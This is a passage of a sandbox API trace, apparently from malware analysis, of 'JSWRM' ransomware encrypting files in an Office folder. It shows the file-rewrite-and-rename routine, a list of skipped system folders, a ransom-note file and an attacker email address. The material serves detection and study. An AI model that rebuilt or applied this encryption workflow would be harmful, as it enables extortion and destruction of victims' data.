WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\IPM.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\ipm.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.870] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=795) returned 1 [0129.870] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.870] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x310, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x310, lpOverlapped=0x0) returned 1 [0129.872] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.872] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x310, lpOverlapped=0x0) returned 1 [0129.872] CloseHandle (hObject=0x314) returned 1 [0129.872] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\IPM.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\ipm.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\IPM.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\ipm.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.873] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb7a9345, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb7a9345, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb7a9345, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="IPML.ICO", cAlternateFileName="")) returned 1 [0129.873] lstrcmpiW (lpString1="IPML.ICO", lpString2=".") returned 1 [0129.873] lstrcmpiW (lpString1="IPML.ICO", lpString2="..") returned 1 [0129.873] lstrcmpiW (lpString1="IPML.ICO", lpString2="...") returned 1 [0129.873] lstrcmpiW (lpString1="IPML.ICO", lpString2="windows") returned -1 [0129.873] lstrcmpiW (lpString1="IPML.ICO", lpString2="recovery") returned -1 [0129.873] lstrcmpiW (lpString1="IPML.ICO", lpString2="perflogs") returned -1 [0129.873] lstrcmpiW (lpString1="IPML.ICO", lpString2="documents and settings") returned 1 [0129.873] lstrcmpiW (lpString1="IPML.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.873] lstrcmpiW (lpString1="IPML.ICO", lpString2="system volume information") returned -1 [0129.873] lstrcmpiW (lpString1="IPML.ICO", lpString2="msocache") returned -1 [0129.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPML.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPML.ICO", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPML.ICO", lpUsedDefaultChar=0x0) returned 8 [0129.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPML.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPML.ICO", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPML.ICO", lpUsedDefaultChar=0x0) returned 8 [0129.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\IPML.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\ipml.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.874] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0129.874] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.874] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0129.876] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.876] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0129.876] CloseHandle (hObject=0x314) returned 1 [0129.876] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\IPML.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\ipml.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\IPML.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\ipml.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.877] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="IPMS.ICO", cAlternateFileName="")) returned 1 [0129.877] lstrcmpiW (lpString1="IPMS.ICO", lpString2=".") returned 1 [0129.877] lstrcmpiW (lpString1="IPMS.ICO", lpString2="..") returned 1 [0129.877] lstrcmpiW (lpString1="IPMS.ICO", lpString2="...") returned 1 [0129.877] lstrcmpiW (lpString1="IPMS.ICO", lpString2="windows") returned -1 [0129.877] lstrcmpiW (lpString1="IPMS.ICO", lpString2="recovery") returned -1 [0129.877] lstrcmpiW (lpString1="IPMS.ICO", lpString2="perflogs") returned -1 [0129.877] lstrcmpiW (lpString1="IPMS.ICO", lpString2="documents and settings") returned 1 [0129.877] lstrcmpiW (lpString1="IPMS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.877] lstrcmpiW (lpString1="IPMS.ICO", lpString2="system volume information") returned -1 [0129.877] lstrcmpiW (lpString1="IPMS.ICO", lpString2="msocache") returned -1 [0129.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPMS.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPMS.ICO", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPMS.ICO", lpUsedDefaultChar=0x0) returned 8 [0129.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPMS.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPMS.ICO", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPMS.ICO", lpUsedDefaultChar=0x0) returned 8 [0129.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.877] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\IPMS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\ipms.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.878] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0129.879] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.879] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0129.880] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.880] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0129.880] CloseHandle (hObject=0x314) returned 1 [0129.880] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\IPMS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\ipms.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\IPMS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\ipms.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.881] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43fd849e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x43fd849e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x43fd849e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0129.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0129.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0129.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0129.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0129.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0129.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0129.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0129.882] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0129.882] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0129.882] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0129.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0129.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0129.882] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="MMSL.ICO", cAlternateFileName="")) returned 1 [0129.882] lstrcmpiW (lpString1="MMSL.ICO", lpString2=".") returned 1 [0129.882] lstrcmpiW (lpString1="MMSL.ICO", lpString2="..") returned 1 [0129.882] lstrcmpiW (lpString1="MMSL.ICO", lpString2="...") returned 1 [0129.882] lstrcmpiW (lpString1="MMSL.ICO", lpString2="windows") returned -1 [0129.882] lstrcmpiW (lpString1="MMSL.ICO", lpString2="recovery") returned -1 [0129.882] lstrcmpiW (lpString1="MMSL.ICO", lpString2="perflogs") returned -1 [0129.882] lstrcmpiW (lpString1="MMSL.ICO", lpString2="documents and settings") returned 1 [0129.882] lstrcmpiW (lpString1="MMSL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.882] lstrcmpiW (lpString1="MMSL.ICO", lpString2="system volume information") returned -1 [0129.882] lstrcmpiW (lpString1="MMSL.ICO", lpString2="msocache") returned -1 [0129.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MMSL.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MMSL.ICO", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MMSL.ICO", lpUsedDefaultChar=0x0) returned 8 [0129.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MMSL.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MMSL.ICO", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MMSL.ICO", lpUsedDefaultChar=0x0) returned 8 [0129.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\MMSL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\mmsl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.883] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=10134) returned 1 [0129.883] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.883] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2790, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x2790, lpOverlapped=0x0) returned 1 [0129.941] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.941] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2790, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x2790, lpOverlapped=0x0) returned 1 [0129.942] CloseHandle (hObject=0x314) returned 1 [0129.942] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\MMSL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\mmsl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\MMSL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\mmsl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.944] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8be, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="MMSS.ICO", cAlternateFileName="")) returned 1 [0129.944] lstrcmpiW (lpString1="MMSS.ICO", lpString2=".") returned 1 [0129.944] lstrcmpiW (lpString1="MMSS.ICO", lpString2="..") returned 1 [0129.944] lstrcmpiW (lpString1="MMSS.ICO", lpString2="...") returned 1 [0129.945] lstrcmpiW (lpString1="MMSS.ICO", lpString2="windows") returned -1 [0129.945] lstrcmpiW (lpString1="MMSS.ICO", lpString2="recovery") returned -1 [0129.945] lstrcmpiW (lpString1="MMSS.ICO", lpString2="perflogs") returned -1 [0129.945] lstrcmpiW (lpString1="MMSS.ICO", lpString2="documents and settings") returned 1 [0129.945] lstrcmpiW (lpString1="MMSS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.945] lstrcmpiW (lpString1="MMSS.ICO", lpString2="system volume information") returned -1 [0129.945] lstrcmpiW (lpString1="MMSS.ICO", lpString2="msocache") returned -1 [0129.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MMSS.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MMSS.ICO", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MMSS.ICO", lpUsedDefaultChar=0x0) returned 8 [0129.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MMSS.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MMSS.ICO", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MMSS.ICO", lpUsedDefaultChar=0x0) returned 8 [0129.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\MMSS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\mmss.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.946] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2238) returned 1 [0129.946] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.946] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8b0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0x8b0, lpOverlapped=0x0) returned 1 [0129.947] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.947] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0x8b0, lpOverlapped=0x0) returned 1 [0129.949] CloseHandle (hObject=0x314) returned 1 [0129.949] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\MMSS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\mmss.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\MMSS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\mmss.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.950] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x30d, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="NOTE.CFG", cAlternateFileName="")) returned 1 [0129.950] lstrcmpiW (lpString1="NOTE.CFG", lpString2=".") returned 1 [0129.950] lstrcmpiW (lpString1="NOTE.CFG", lpString2="..") returned 1 [0129.950] lstrcmpiW (lpString1="NOTE.CFG", lpString2="...") returned 1 [0129.950] lstrcmpiW (lpString1="NOTE.CFG", lpString2="windows") returned -1 [0129.950] lstrcmpiW (lpString1="NOTE.CFG", lpString2="recovery") returned -1 [0129.950] lstrcmpiW (lpString1="NOTE.CFG", lpString2="perflogs") returned -1 [0129.950] lstrcmpiW (lpString1="NOTE.CFG", lpString2="documents and settings") returned 1 [0129.950] lstrcmpiW (lpString1="NOTE.CFG", lpString2="$RECYCLE.BIN") returned 1 [0129.950] lstrcmpiW (lpString1="NOTE.CFG", lpString2="system volume information") returned -1 [0129.950] lstrcmpiW (lpString1="NOTE.CFG", lpString2="msocache") returned 1 [0129.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NOTE.CFG", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NOTE.CFG", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NOTE.CFG", lpUsedDefaultChar=0x0) returned 8 [0129.951] 